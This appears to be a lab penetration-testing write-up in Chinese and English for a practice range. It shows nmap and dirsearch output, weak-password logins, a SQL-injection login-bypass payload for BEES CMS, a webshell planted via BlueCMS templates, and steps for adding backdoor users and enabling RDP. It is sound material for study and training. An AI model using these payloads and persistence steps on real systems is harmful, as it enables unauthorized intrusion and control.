Zerologon

Nmap [root@Hacking] /home/kali/vulntarget-a ❯ nmap 192.168.237.132 -A PORT STATE SERVICE VERSION 80/tcp open http nginx | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3 | http-robots.txt: 1 disallowed entry |_/ 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) MAC Address: 00:0C:29:99:58:97 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: specialized|phone Running: Microsoft Windows 7|Phone OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows OS details: Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0 Network Distance: 1 hop Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:99:58:97 (VMware) |_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s | smb2-security-mode: | 2:1:0: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: win7-PC | NetBIOS computer name: WIN7-PC\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2025-09-04T10:23:53+08:00 | smb2-time: | date: 2025-09-04T02:23:53 |_ start_date: 2025-09-04T02:22:36 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) TRACEROUTE HOP RTT ADDRESS 1 0.32 ms 192.168.237.132 Dirsearch [root@Hacking] /home/kali/vulntarget-a ❯ dirsearch -u 'http://192.168.237.132/' _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289 Target: http://192.168.237.132/ [10:37:07] Scanning: [10:37:08] 400 - 166B - /\..\..\..\..\..\..\..\..\..\etc\passwd [10:37:11] 301 - 178B - /api -> http://192.168.237.132/api/ [10:37:11] 403 - 564B - /api/ [10:37:11] 403 - 564B - /attachment.asp [10:37:11] 403 - 564B - /attachment.aspx [10:37:11] 403 - 564B - /attachment.jsp [10:37:11] 403 - 564B - /attachment.html [10:37:11] 403 - 564B - /attachment.htm [10:37:11] 403 - 564B - /attachmentedit.asp [10:37:11] 403 - 564B - /attachmentedit.aspx [10:37:11] 403 - 564B - /attachmentedit.html [10:37:11] 403 - 564B - /attachmentedit.jsp [10:37:11] 403 - 564B - /attachmentedit.htm [10:37:11] 403 - 564B - /attachments [10:37:11] 403 - 564B - /attachments.aspx [10:37:11] 403 - 564B - /attachments.jsp [10:37:11] 403 - 564B - /attachments.html [10:37:11] 403 - 564B - /attachments.htm [10:37:11] 403 - 564B - /attachments.asp [10:37:13] 200 - 894B - /favicon.ico [10:37:13] 301 - 178B - /general -> http://192.168.237.132/general/ [10:37:14] 301 - 178B - /images -> http://192.168.237.132/./images/ [10:37:14] 403 - 564B - /./images/ [10:37:14] 403 - 564B - /./images/Sym.php [10:37:14] 403 - 564B - /./images/c99.php [10:37:14] 301 - 178B - /inc -> http://192.168.237.132/inc/ [10:37:14] 403 - 564B - /inc/ [10:37:14] 200 - 10KB - /index.php [10:37:14] 400 - 166B - /index.php::$DATA [10:37:14] 200 - 10KB - /index.php. [10:37:14] 200 - 10KB - /index.pHp [10:37:15] 301 - 178B - /mobile -> http://192.168.237.132/mobile/ [10:37:16] 301 - 178B - /portal -> http://192.168.237.132/portal/ [10:37:17] 200 - 26B - /robots.txt [10:37:17] 301 - 178B - /share -> http://192.168.237.132/share/ [10:37:17] 200 - 0B - /share/ [10:37:17] 200 - 2KB - /portal/ [10:37:18] 301 - 178B - /static -> http://192.168.237.132/static/ [10:37:18] 301 - 178B - /static.. -> http://192.168.237.132/static/ [10:37:18] 403 - 564B - /templates/beez/index.php [10:37:18] 403 - 564B - /templates/ja-helio-farsi/index.php [10:37:18] 403 - 564B - /templates/rhuk_milkyway/index.php [10:37:18] 400 - 166B - /Trace.axd::$DATA [10:37:19] 400 - 166B - /web.config::$DATA [10:37:19] 301 - 178B - /WebService -> http://192.168.237.132/WebService/ Task Completed 下文中IP我改动了一下，因为有些工具在kali不好用 ...

EmpireCMS 进入80端口发现帝国CMS，版本是7.5 来到/e/admin/index.php是后台登录地址，使用弱口令：admin/admin，猜测认证码是cslab（最多尝试五次，然后锁定一小时，有点坑哦） 上传一个mod文件 ...

BEES CMS fscan扫描到6582端口 经过搜索发现后台登录的用户名处存在SQL注入 通过联合注入伪造登录 user=-1'+uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0+%23&password=123456&code=dd18&submit=true&submit.x=0&submit.y=0 在后台进行上传文件 连接成功，在根目录拿到flag1 上线cs，开启RDP，添加后门用户 ...

BlueCMS fscan扫描到192.168.10.10:5820端口开放，并且运行了Bluecms，并且版本是v1.6 进入到/admin管理员登录界面，尝试弱密码登录成功：admin/admin123456 来到模板管理，编辑第一个进行抓包 添加一句话木马，修改一下文件名，连接成功，在根目录拿到flag1 已经是最高权限了，直接上线CS 添加后门用户以及开启RDP ...